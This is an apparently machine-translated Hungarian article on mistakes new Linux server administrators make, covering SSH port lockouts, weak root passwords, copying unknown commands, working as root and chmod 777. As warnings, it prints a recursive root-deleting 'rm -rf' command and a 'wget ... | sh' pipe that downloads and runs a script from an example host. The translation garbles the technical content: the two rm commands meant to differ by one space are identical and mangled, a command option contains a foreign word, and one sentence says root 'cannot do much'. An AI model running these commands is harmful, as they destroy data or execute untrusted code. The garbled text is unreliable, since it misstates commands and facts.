A Linux parancssor lehetővé teszi a kiszolgáló rendszergazdák számára a szervereik és a rajtuk tárolt adatok ellenőrzését, de kevéssé állítja le őket pusztító parancsok futtatásában, amelyek következményei nem vonhatók vissza. A véletlenszerű adatok törlése csak egyfajta hiba, amelyet az új szerver-rendszergazdák elkövetnek.
A kulcsok bezárása bent
A kiszolgáló rendszergazdái SSH-hez csatlakoznak a szerverekhez, amely szolgáltatás általában a 22-es porton fut, és bejelentkezési héjat biztosítanak, amelyen keresztül a hitelesített felhasználók távoli szervereken futtathatnak parancsokat. A biztonsági hardver standard lépése az SSH beállítása egy másik porton lévő kapcsolatok elfogadására. Az SSH áthelyezése nagyszámú véletlenszerű portra korlátozza a durva erővel járó támadások hatását; a hackerek nem próbálkozhatnak rosszindulatú bejelentkezésekkel, ha nem találják azt a portot, amelyen az SSH hallgatja.
Azonban egy rendszergazda, aki úgy konfigurálja az SSH-t, hogy egy másik porton hallgassa, majd újraindítsa az SSH-kiszolgálót, azt tapasztalhatja, hogy nem csak a hackerek vannak bezárva. Ha a kiszolgáló tűzfalát sem állítják át úgy, hogy engedélyezze a kapcsolatokat az új porton, akkor a csatlakozási kísérletek soha nem fogják elérni az SSH szervert. Az adminisztrátor bezárul a szerverükről, és nem tudja megoldani a problémát, kivéve, ha támogatási jegyet nyit a tárhelyszolgáltatójánál. Ha megváltoztatja az SSH-portot, mindenképpen nyissa meg az új portot a kiszolgáló tűzfal-konfigurációjában.
Könnyen kitalálható jelszó kiválasztása
A nyers erővel járó támadások találgatások. A támadó sok felhasználónévvel és jelszóval próbálkozik, amíg el nem találja azt a kombinációt, amely beengedi őket. A szótári támadás kifinomultabb megközelítés, amely jelszavak listáját használja, gyakran kiszivárgott jelszó-adatbázisokból. A root fiókkal szembeni támadások könnyebbek, mint más fiókok ellen, mert a támadó már ismeri a felhasználónevet. Ha egy root fióknak egyszerű jelszava van, akkor azt pillanatok alatt feltörheti.
Háromféleképpen lehet védekezni mind a nyers erővel, mind a szótárral szembeni támadások ellen a root fiókkal szemben.
- Válasszon hosszú és összetett jelszót. Az egyszerű jelszavakat könnyű feltörni; hosszú és összetett jelszavak lehetetlenek.
- Az SSH konfigurálásával tiltsa le a gyökér bejelentkezéseket. Ez egy egyszerű konfigurációs változás, de győződjön meg arról, hogy a „sudo” úgy van konfigurálva, hogy lehetővé tegye a fiók számára a jogosultságok emelését.
- Használjon kulcsalapú hitelesítést jelszavak helyett. A tanúsítvány alapú bejelentkezések teljesen kiküszöbölik a durva erő támadásainak kockázatát.
Nem értett parancsok másolása
A Stack Exchange, a Server Fault és a hasonló helyek mentőövek az új Linux rendszeradminisztrátorok számára, de el kell kerülnie a kísértést, hogy másoljon és beillesszen egy nem ismert shell parancsot. Mi a különbség e két parancs között?
sudo rm -rf --no-säilitada-root / mnt / mydrive /sudo rm -rf --no-säilitada-root / mnt / mydrive /
Könnyen belátható, ha együtt jelennek meg, de nem olyan könnyű, ha fórumokban keresgél, és parancsot keres a csatlakoztatott kötet tartalmának törléséhez. Az első parancs töröl minden fájlt a csatlakoztatott meghajtóról. A második parancs törli ezeket a fájlokat és mindent a szerver gyökér fájlrendszerén. Az egyetlen különbség az utolsó perjel előtti tér.
A kiszolgáló rendszergazdák hosszú parancsokkal találkozhatnak olyan csővezetékekkel, amelyek állítólag egy dolgot csinálnak, de teljesen mást csinálnak. Különösen vigyázzon az internetről kódot letöltő parancsokkal.
wget http: // példa.com / verybadscript -O - | SH -Ez a parancs a wget használatával letölti a parancsfájlhoz csatolt és végrehajtott parancsfájlt. A biztonságos futtatáshoz meg kell értenie, hogy a parancs mit csinál, és azt is, hogy mit csinál a letöltött szkript, beleértve a letöltött szkript bármelyik kódját.
Bejelentkezés root felhasználóként
Míg a hétköznapi felhasználók csak a saját mappájukban lévő fájlokat módosíthatják, a root felhasználó nem sok mindent képes megtenni egy Linux szerveren. Bármely szoftvert futtathat, adatokat olvashat és fájlokat törölhet.
A root felhasználó által futtatott alkalmazások hasonló erővel bírnak. Kényelmes a root felhasználóként bejelentkezni, mert nem kell állandóan „sudo” vagy „su”, de veszélyes. Az elgépelés másodpercek alatt tönkreteheti a szervert. A root felhasználó által futtatott hibás szoftver katasztrófát idézhet elő. A mindennapi műveletekhez jelentkezzen be rendes felhasználóként, és csak szükség esetén emelje fel a root jogosultságokra.
Nem tanuljuk meg a fájlrendszer engedélyeit
A fájlrendszer engedélyei zavaróak és frusztrálóak lehetnek az új Linux felhasználók számára. A „drwxr-xr-x” típusú jogosultsági karakterlánc eleinte értelmetlenül néz ki, és az engedélyek megakadályozhatják a fájlok módosítását, és a szoftvereket nem tehetik meg, amit akarnak.
A rendszergazdák gyorsan megtudják, hogy a chmod 777 egy varázslatos varázslat, amely megoldja a legtöbb problémát, de ez egy szörnyű ötlet. Ez lehetővé teszi, hogy mindenki, aki rendelkezik fiókkal, olvassa, írja és futtassa a fájlt. Ha a parancsot egy webkiszolgáló könyvtárában futtatja, akkor feltörést kér. A Linux fájlengedélyek bonyolultnak tűnnek, de ha néhány percet vesz igénybe a működésük megismeréséhez, felfedez egy logikus és rugalmas rendszert a fájlhozzáférés ellenőrzésére.
Egy olyan korszakban, amely az egyszerű felhasználói tapasztalatokat értékeli minden más tényezővel szemben, a Linux parancssora továbbra is határozottan összetett és ellenáll az egyszerűsítésnek. Nem keveredhet át, és remélheti, hogy minden rendben lesz. Nem lesz jó, és a végén katasztrófa lesz a kezeden.
De ha megtanulja az alapokat - fájlengedélyeket, parancssori eszközöket és azok opcióit, a legjobb biztonsági gyakorlatokat -, akkor az egyik leghatékonyabb számítógépes platform mesterévé válhat.